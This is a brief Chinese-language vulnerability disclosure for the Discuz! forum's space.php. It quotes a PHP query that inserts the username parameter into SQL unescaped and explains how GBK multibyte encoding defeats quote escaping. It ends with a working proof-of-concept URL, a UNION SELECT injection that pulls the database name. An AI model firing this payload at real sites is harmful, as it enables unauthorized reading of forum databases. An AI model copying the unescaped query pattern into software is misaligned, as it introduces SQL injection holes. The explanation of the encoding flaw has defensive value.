discuz的空间功能 space.php
$member = $db->fetch_first("SELECT m.*, mf.*, u.grouptitle, u.type, u.creditshigher, u.creditslower,
u.readaccess,
u.color AS groupcolor, u.stars AS groupstars, u.allownickname, u.allowuseblog, r.ranktitle,
r.color AS rankcolor, r.stars AS rankstars $oltimeadd1
FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf ON mf.uid=m.uid
LEFT JOIN {$tablepre}usergroups u ON u.groupid=m.groupid
LEFT JOIN {$tablepre}ranks r ON m.posts>=r.postshigher
$oltimeadd2
WHERE ".($uid ? "m.uid='$uid'" : "m.username='$username'")."ORDER BY r.postshigher DESC LIMIT
1");


查询中包含username值查询,经过编码构造可产生注射漏洞 UTF-8 不存在此漏洞

最近常出现类似的编码注射漏洞,这是因为例如gbk这种编码下php服务器不能很好的过滤'号
所
以造成漏洞的发生,而使用UTF-8编码的程序不会出现这个问题,不会产生编码转换时的错误,
引
号得到了完好过滤,杜绝了编码注射漏洞的发生.

http://地址/space.php?username=%cf'%20UNION%20Select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
,
36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,
6
8,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*